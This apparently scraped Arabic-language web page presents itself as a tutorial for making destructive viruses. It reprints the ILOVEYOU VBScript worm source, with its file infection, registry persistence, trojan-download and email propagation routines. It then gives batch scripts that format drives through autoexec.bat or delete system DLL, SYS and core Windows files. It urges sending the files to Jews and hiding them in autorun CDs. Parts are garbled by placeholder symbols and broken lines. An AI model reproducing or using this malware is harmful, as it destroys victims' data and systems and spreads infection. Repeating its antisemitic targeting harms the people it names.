Stay Signed In
Do you want to access your site more quickly on this computer? Check this box, and your username and password will be remembered for two weeks. Click logout to turn this off.
Stay Safe
Do not check this box if you are using a public computer. You don't want anyone seeing your personal info or messing with your site.
هنا كل شيئ جاهز ما غليك سوئ نسخ ما هو مكتوب وستصنع اخطر الفيروسات
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow
eq=""
ctr=0
Set fso = CreateObject("@-@@-@@-@@-@@-@@-@ing.FileSystemObject")
set file = fso.OpenTextFile(W@-@@-@@-@@-@@-@@-@.@-@@-@@-@@-@@-@@-@Fullname,1)
vbscopy=file.ReadAll
REM main() ' CSS: Main has been REMed out to provide more innoculation. unREM to run.
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("W@-@@-@@-@@-@@-@@-@.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows @-@@-@@-@@-@@-@@-@ing Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows @-@@-@@-@@-@@-@@-@ing Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(W@-@@-@@-@@-@@-@@-@.@-@@-@@-@@-@@-@@-@FullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
REM spreadtoemail() ' CSS: Causes the worm to propogate itself. REMed for even more innoculation.
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL .vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/ HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf
7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/ skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j
nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/ jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V
bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/ sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about :blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
Sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.pathext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.Get@-@@-@@-@@-@Name(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="@-@@-@@-@@-@@-@@-@.ini") or (s="mirc.hlp") then
set @-@@-@@-@@-@@-@@-@ini=fso.CreateTextFile(folderspec&"\@-@@-@@-@@-@@-@@-@.i ni")
@-@@-@@-@@-@@-@@-@ini.WriteLine "[@-@@-@@-@@-@@-@@-@]"
@-@@-@@-@@-@@-@@-@ini.WriteLine ";mIRC @-@@-@@-@@-@@-@@-@"
@-@@-@@-@@-@@-@@-@ini.WriteLine "; Please dont edit this @-@@-@@-@@-@@-@@-@... mIRC will corrupt, if mIRC will"
@-@@-@@-@@-@@-@@-@ini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
@-@@-@@-@@-@@-@@-@ini.WriteLine ";"
@-@@-@@-@@-@@-@@-@ini.WriteLine ";Khaled Mardam-Bey"
@-@@-@@-@@-@@-@@-@ini.WriteLine ";http://www.mirc.com/"
@-@@-@@-@@-@@-@@-@ini.WriteLine ";"
@-@@-@@-@@-@@-@@-@ini.WriteLine "n0=on 1:JOIN:#:{"
@-@@-@@-@@-@@-@@-@ini.WriteLine "n1= /if ( $nick == $me ) { halt }"
@-@@-@@-@@-@@-@@-@ini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
@-@@-@@-@@-@@-@@-@ini.WriteLine "n3=}"
@-@@-@@-@@-@@-@@-@ini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("W@-@@-@@-@@-@@-@@-@.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("W@-@@-@@-@@-@@-@@-@.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega
d
set regedit=CreateObject("W@-@@-@@-@@-@@-@@-@.Shell")
set out=W@-@@-@@-@@-@@-@@-@.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&ma lead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
@-@@-@@-@@-@@-@@-@ bgcolor="#000000" Text="#C0C0C0">
<@-@@-@@-@@-@@-@@-@ language="VB@-@@-@@-@@-@@-@@-@">
Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
وتنسخ الكود الي تحت وتضعه في المفكره و تعمل حفظ باسم وتكتب اسم الملف
الاسم مثلا not
تكتب not.bat وسيحفظ على شكل مربع ابيض داخله ترس اصفر بس لا تحاول
ولا تفكر تفتح الملف بعد صنعه وارسله فقط لليهود
وهذي الفيروسات مع عملها بس لا تنسخ عمل الفايروس في المفكره
فايروس عمل فورمات على C,D,E,F
0000FF
عمل فورمات C,D,E,F والطابعه
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo I love my girl
echo Smart Hacker
عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo I love my girl
echo Smart Hacker
c:\windows\rundll.exe user.exe,exitwindowsexec
عمل فورمات C,D,E,F والطابعه وقفل الجهاز
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo I love my girl
echo Smart Hacker
c:\windows\rundll32.exe user.exe,exitwindows
قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
echo Smart Hacker
قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز
وبعد عمل الملف يمكنك تغير ايقونة الملف بطريقه الضغط عليه
باليمين واختر خصائص
هذا الفيرس هو عباره عن مجموعه من الأوامر التى تقوم بالغاء الملفات
المهمه بالكمبيوتر
* تكمن سر قوته فى أنه لا يوجد برنامج أنتى فيرس يقوم باصطياده لأنه نظيف تماما
@ وهتكون صناعه ايديك يعنى ماحدش يعرفه ....... يلا نبدأ؟
أولا افتح -----> start واضغط على Run واكتب command واضغط على ENTAR
بكده هتفتح DOS
ثانيا : قم بكتابه هذا الامر داخل dos
copy con virus.bat ثم اضغط ENTAR
ودلوقتى أكتب السطور دى
*ملحوظه : بعد كل سطر اضغط ENTAR
del system.ini
delwin.ini
del auto exec.bat
del config.sys
وبعد كده اضغط ctrl + z وبعدين ENTAR
بالاوامر دى انت عملت فيرس اسمه virus.bat
والملف ده هيكون موجود فى c:windows
*****أوعى تشغله ******
لأن الملف ده لو شخص شغله بكمبيوتره مش هيحس بحاجه بس بعد ما يعمل shut downأو ريستارت مش هيشغله مره تانيه
*فكره*
غير اسم الملف من virus.bat الى auto run.bat وخزنه على cd
وادى cd لاى شخص بمجرد ان يدخل الcd يشغل بكده الملف بتاعنا وهو مش عارف حصل ايه بس لما يطفى الجهاز .....ينسى يشغله تانى
الثاني:
طريقة حديثة لصناعة فوسات بحجم صغير وذات قوة أكبر من الفوسات المصممة ببرامج ...
وظيفتها//حذف ملفات الــsys و dll وبكذا راح ينتهي الجهاز ولازم تفرمته من جديد
AUTOEXEC.BAT
ولكن احذر بعد عمل هذا الفيرس اياك ان تغلق الجهاز او ان تعيد تشغيلة وهو موجود علي القرص الصلب والا بعد اعادة التشغيل لن تجد النظام فهو يعمل مباشرة بدون الضغط علية لذا قم بحفظة علي وسيط بعد صنعة.
الثالث:
بالمفكرة ايضا
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
قم بحفظ الملف بالاسم الذي تريده بامتداد bat
يحذف ملفات SyS و dll
الرابع :
كود فيروس لتدمير الويندوز
Del c:\windows\system\msconfig.exe
Del c:\windows\Rundll32.exe
Del c:\windows\regedit.exe
Del c:\windows\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
Del c:\windows\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe